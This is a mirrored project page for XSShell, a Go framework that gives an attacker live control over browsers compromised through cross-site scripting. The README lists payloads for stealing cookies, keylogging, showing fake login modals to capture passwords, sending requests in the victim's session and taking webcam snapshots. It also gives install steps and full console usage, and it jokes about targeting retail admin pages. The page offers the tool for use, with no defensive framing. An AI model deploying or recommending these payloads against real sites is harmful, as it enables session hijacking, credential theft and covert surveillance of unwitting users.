项目作者: raz-varren

项目描述 :
An XSS reverse shell framework
高级语言: Go
项目地址: git://github.com/raz-varren/xsshell.git
创建时间: 2018-11-27T05:42:58Z
项目社区:https://github.com/raz-varren/xsshell

开源协议:MIT License

下载


XSShell

XSShell is a cross-site-scripting reverse shell… Okay, well maybe it’s not a true reverse shell, but it will allow you to interact in real time with an XSS victim’s browser.

Just run the xsshell binary to setup your listener endpoint, do your XSS thing to get the exploit js onto the victim’s browser, and as soon as they run it you should see something like this popup in your console:

  1. ====== start socket: 1, header: AmaaKrM= ======
  2. socket connected: 1
  3. user agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  4. page url: http://example.com/
  5. referrer: http://google.com/
  6. cookies: phpsessid=abababababababab
  7. ====== end socket: 1, header: AmaaKrM= ======

Once you have a connection you can execute any javascript file you want on the browser, and have that script return data to your console. This may not seem very useful at first, but it allows you to be more tactical and react in real time to the environment that the script is running on. Environments like say… an admin page used to approve and manage orders placed on a retail site :)

XSShell also comes with a number of premade XSS payloads to use:

  • \alert - send a js alert message
  • \cs - get cookies and any updates to the cookies
  • \gi - download all images on the page
  • \kl - key logger
  • \ll - list all links on the page
  • \src - download the current page source
  • \pfl - show the user a modal and prompt them to login
  • \xhr - make xhr requests in the context of the victim’s browser
  • \ct - crash the victim’s browser tab
  • \wcs - attempt to take a snapshot from the victim’s webcam (WARNING: most modern browsers will prompt for access to webcams)

Install

To install xsshell run:

  1. go get github.com/raz-varren/xsshell
  2. go install github.com/raz-varren/xsshell

Mods

If you modify any of the JS files in this package, make sure you run:

  1. go generate github.com/raz-varren/xsshell...
  2. go install github.com/raz-varren/xsshell

This will ensure that the updated files are packed into the binary.

Usage

The xsshell command:

  1. xsshell -h
  2. Usage of xsshell:
  3. -cert string
  4. ssl cert file
  5. -host string
  6. websocket listen address
  7. -key string
  8. ssl key file
  9. -log string
  10. specify a log file to log all console communication
  11. -path string
  12. websocket connection path (default "/s")
  13. -port string
  14. websocket listen port (default "8234")
  15. -servdir string
  16. specify a directory to serve files from. a file server will not be started if no directory is specified
  17. -servpath string
  18. specify the base url path that you want to serve files from (default "/static/")
  19. -wrkdir string
  20. working directory that will be used as the relative root path for any commands requiring user provided file paths (default "./")

Starting the shell console:

  1. xsshell
  2. listening for sockets on :8234, at url path: /s
  3. starting console
  4. type \? to list available commands
  5. xsshell >
  6. xsshell > \?
  7. xsshell > \help \? \h: list available commands
  8. xsshell > \alert: send an alert message to the target set
  9. xsshell > usage: \alert ALERT_MESSAGE
  10. xsshell > \cs: get the current cookies from the target set's current page and any cookie updates.
  11. xsshell > \ct: crash the target set's tab
  12. xsshell > \emd: return a list of media devices accessible to the target set's browser
  13. xsshell > \ex: print out the client exploit javascript
  14. xsshell > \exm: print out the minified version of the client exploit javascript
  15. xsshell > \gi: download all images on the target set's page.
  16. xsshell > images will be stored in DOWNLOAD_DIR.
  17. xsshell > relative file paths are relative to the path provided to -wrkdir
  18. xsshell > usage: \gi [DOWNLOAD_DIR]
  19. xsshell > examples:
  20. xsshell > \gi
  21. xsshell > \gi /tmp/images
  22. xsshell > \gi imgdir
  23. xsshell > \kl: start a keylogger on the target set
  24. xsshell > \ll: list out any links found on the target set's currently open page
  25. xsshell > \pfl: open a modal on the target set's page prompting them for a username and password
  26. xsshell > \ps: print out socket info for all actively connected websockets
  27. xsshell > \q: exit this program
  28. xsshell > \sf: send a javascript file to the target set and execute it.
  29. xsshell > any data can be returned from the target set by calling `this.send(\"return data string\");` in the script.
  30. xsshell > relative file paths are relative to the path provided to -wrkdir
  31. xsshell > usage: \sf FILE_PATH
  32. xsshell > \sfl: resend the last file that was sent using \sf, includes any new changes to the file
  33. xsshell > \src: get the target set's currently rendered page source
  34. xsshell > \st: set the websockets to target. one or more targets can be set with the following methods:
  35. xsshell > * -targets all active websocket connections (default target set)
  36. xsshell > 8 -target a single websocket connection belonging to that id number
  37. xsshell > 1,2,8,10 -targets all websocket IDs in the comma separated list
  38. xsshell > 4-16 -targets all websocket IDs from the lowest number listed to the highest number listed
  39. xsshell > 4- -targets all websocket IDs that are greater than or equal to the listed number
  40. xsshell > -16 -targets all websocket IDs that are less than or equal to the listed number
  41. xsshell > usage: \st TARGET_SET
  42. xsshell > examples:
  43. xsshell > \st *
  44. xsshell > \st 2
  45. xsshell > \st 2,4,7
  46. xsshell > \st 10-15
  47. xsshell > \st 6-
  48. xsshell > \st -100
  49. xsshell > \wcs: attempt to take a snapshot from the target set's webcam, if one is available.
  50. xsshell > images will be stored in DOWNLOAD_DIR.
  51. xsshell > relative file paths are relative to the path provided to -wrkdir.
  52. xsshell > NOTE: using this command may prompt the target set for webcam access.
  53. xsshell > the target set may reject the prompt, or ignore it entirely.
  54. xsshell > usage: \ws [DOWNLOAD_DIR]
  55. xsshell > examples:
  56. xsshell > \wcs /tmp/webcam_snaps
  57. xsshell > \wcs snaps
  58. xsshell > \xhr: send an xhr request from the target set's current page
  59. xsshell > usage: \xhr HTTP_METHOD FULL_URL [CONTENT_HEADER] [POST_BODY]
  60. xsshell > examples:
  61. xsshell > \xhr GET https://google.com/
  62. xsshell > \xhr POST https://google.com/ application/json {"hello": "world"}
  63. xsshell >